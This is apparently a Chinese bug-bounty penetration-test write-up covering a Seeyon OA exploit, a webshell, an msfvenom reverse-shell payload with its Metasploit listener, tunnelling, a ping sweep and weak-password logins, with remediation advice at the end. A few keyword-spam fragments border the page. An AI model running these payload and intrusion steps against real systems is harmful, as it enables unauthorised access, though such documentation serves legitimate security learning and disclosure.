<menu id="guoca"></menu>
<nav id="guoca"></nav><xmp id="guoca">
  • <xmp id="guoca">
  • <nav id="guoca"><code id="guoca"></code></nav>
  • <nav id="guoca"><code id="guoca"></code></nav>

    滲透測試:從Web到內網

    一顆小胡椒2022-03-24 07:12:23

    0x01 前言

    由于最近某SRC開啟眾測福利,所以咱就跟著挖個洞,寫篇文章,一舉兩得。(厚碼見諒)嘿嘿

    0x02 WEB撕口子

    Web方面的突破口是一個OA系統

    致遠OA嘛大家都知道,網上復現教程也特別多所以就不在多啰嗦了直接上EXP利用,(工具是本人自己寫的哈),地址是:https://github.com/XiaoBai-12138/OA-EXP

    傳完馬子冰蝎連接準備后續操作

    到這里本想添加個用戶直接遠程登陸服務器了,但是遇到了點問題遠程桌面沒開啟(也可能是換了端口)

    然后我們試著找找rdp服務看看是否啟用,端口是多少

    tasklist /svc | find "Ter"
    

    這里我們發現RDP服務存在,端口被改成了3308

    0x03 內網部分

    用IP:3308登陸結果還是拒絕連接,這時候懷疑是只允許內網登陸,我們用MSF生成個馬子,先上線MSF再說

    msfvenom -a x64 --platform Windows -p windows/x64/meterpreter/reverse_tcp  LHOST=MSFIP地址 LPORT=端口 -f exe -o /root/vhs.exe
    

    然后開啟監聽并將root目錄下生成的馬子上傳到目標中運行

    msf6> use exploit/multi/handler
    msf6 exploit(multi/handler) > set payload windows/x64/meterpreter/reverse_tcp
    msf6 exploit(multi/handler) > set lhost 127.0.0.1
    msf6 exploit(multi/handler) > set lport 3080
    msf6 exploit(multi/handler) > exploit
    

    上線以后查看系統信息,權限等

    發現是用戶權限,使用默認的提權來試試,直接OK...

    接下來搭建個socks5隧道,以便內網橫向啥的。這里我使用的是NPS隧道,這個在Github上開源的項目,這里就不細說了,有需要的話我在單獨出一篇關于隧道的文章。

    搭建好隧道以后使用proxychains連接socks隧道,此時我們MSF機器的IP已經變成目標機的IP地址了

    這次使用內網的IP登陸遠程桌面,已經發現可以登陸了

    MSF接著信息收集,掃描內網主機發現沒域控,那就直接用目標的cmd一句話探測了

    C:\Windows\system32>for /l %i in (1,1,255) do @ping 192.168.*.%i -w 1 -n 1 | find /i "ttl"
    for /l %i in (1,1,255) do @ping 192.168.*.%i -w 1 -n 1 | find /i "ttl"
    Reply from 192.168.*.21: bytes=32 time<1ms TTL=128
    Reply from 192.168.*.22: bytes=32 time<1ms TTL=128
    Reply from 192.168.*.100: bytes=32 time<1ms TTL=128
    Reply from 192.168.*.101: bytes=32 time<1ms TTL=128
    Reply from 192.168.*.102: bytes=32 time<1ms TTL=128
    Reply from 192.168.*.103: bytes=32 time<1ms TTL=64
    Reply from 192.168.*.105: bytes=32 time<1ms TTL=128
    Reply from 192.168.*.106: bytes=32 time<1ms TTL=128
    Reply from 192.168.*.107: bytes=32 time<1ms TTL=128
    Reply from 192.168.*.108: bytes=32 time<1ms TTL=64
    Reply from 192.168.*.150: bytes=32 time<1ms TTL=128
    Reply from 192.168.*.151: bytes=32 time<1ms TTL=128
    Reply from 192.168.*.155: bytes=32 time<1ms TTL=128
    Reply from 192.168.*.187: bytes=32 time<1ms TTL=128
    Reply from 192.168.*.188: bytes=32 time<1ms TTL=128
    Reply from 192.168.*.189: bytes=32 time<1ms TTL=128
    Reply from 192.168.*.201: bytes=32 time<1ms TTL=128
    Reply from 192.168.*.254: bytes=32 time<1ms TTL=255
    Reply from 192.168.*.254: bytes=32 time<1ms TTL=255
    

    通過TTL可以看到應該兩臺Linux機器,直接SSH連接,密碼123456789登陸成功。。。

    Windows也一樣,密碼123456789圖就不貼了沒意思。。

    成果:

    • 避免影響人家業務就沒有進行批量端口掃描等大量占用帶寬的行為就只測了常用端口;
    • 弱口令拿下兩臺內網Linux服務器;
    • 弱口令拿下多臺Windows服務器;
    • 內網弱口令拿下兩個后臺管理系統;

    修復建議:

    • 問題漏洞已提交廠商
    • 友情提示大家別因為是內網就放松警惕,那密碼直接就123456。。。都整無語了
    • 然后歡迎也大家跟我一起交流學習,文章有哪里不足請各位大佬多多包涵
    滲透測試bytes
    本作品采用《CC 協議》,轉載必須注明作者和本文鏈接
    0x01 前言由于最近某SRC開啟眾測福利,所以咱就跟著挖個洞,寫篇文章,一舉兩得。
    RDP憑證本機RDP密碼抓取本機RDP密碼是一個我們常遇到的場景,通常使用mimikatz抓取RDP密碼。當系統為win10或2012R2以上時,默認在內存緩存中禁止保存明文密碼,這時抓取的明文密碼為空。上不了線的情況下,也可以在webshell中來dump內存,保存到本地解密即可。
    Mssql 從測試到實戰
    2022-05-23 07:12:19
    支持主機存活探測、端口掃描、常見服務的爆破、ms17010、redis批量寫公鑰、計劃任務反彈shell、讀取win網卡信息、web指紋識別、web漏洞掃描、netbios探測、域控識別等功能。項目地址:http://sqlmap.org/3、多種數據庫管理工具工具一:HeidiSQLHeidiSQL 是免費軟件,其目標是易于學習。
    本文將分享國外一位白帽子對于多重身份驗證功能實施滲透測試時的一些經驗,希望能對你有所啟發。
    #Cobalt Strike 主要用于團隊作戰,可謂是團隊滲透神器,能讓多個攻擊者同時連接到團體服務器上,共享攻擊資源與目標信息和sessions。#Cobalt Strike 作為一款協同APT工具,針對內網的滲透測試和作為apt的控制終端功能,使其變成眾多APT組織的首選。
    Cobalt strike(下面簡稱 CS)# 眾所周知,CS是一個以MSF為基礎的GUI框架式“多人運動”滲透測試工具,集成了端口轉發、服務掃描、自動化溢出,多模式端口監聽,exe、powershell木馬生成等.# 釣魚攻擊包括:站點克隆,目標信息獲取,java執行,瀏覽器自動攻擊等。# Cobalt Strike 主要用于團隊作戰,可謂是團隊滲透神器,能讓多個攻擊者同時連接到團體服務器上,共
    對這段時間做的一次攻防演練做一個記錄,這次給我們分了三個目標,一個目標是甲方單位自己的一個自建系統,其余兩個是甲方的下級單位的系統。開始之前覺得不好做,因為攻防演練跟HW有些差別,HW可以不限制攻擊手法,可以從上游供應鏈,社工、釣魚多種角度出發來挖掘漏洞。這次攻防演練給我們三個目標、兩個web系統、一個app,可以利用的點非常少,不可以攻擊其他的系統,只能搞這幾個目標,要不是這次運氣好真的就拉垮了
    CrowdStrike的云威脅研究團隊在CRI-O(一個支撐Kubernetes的容器運行時引擎)中發現了一個新的漏洞(CVE-2022-0811),被稱為“cr8escape”。
    前言看到一篇文章講到這個內容,就打算自己也整理一下順便梳理一下思路0X01 信息收集1.收集系統信息:系統信息至關重要,關乎我們后面怎么提權中文系統:systeminfo|findstr /B /C:"OS 名稱" /C:"OS 版本". OS 名稱: Microsoft Windows Server 2008 R2 Standard. 禁用 入站 Internet Explorer / C:\Program Files \In. 800 TCP 啟用 入站 test
    一顆小胡椒
    暫無描述
      亚洲 欧美 自拍 唯美 另类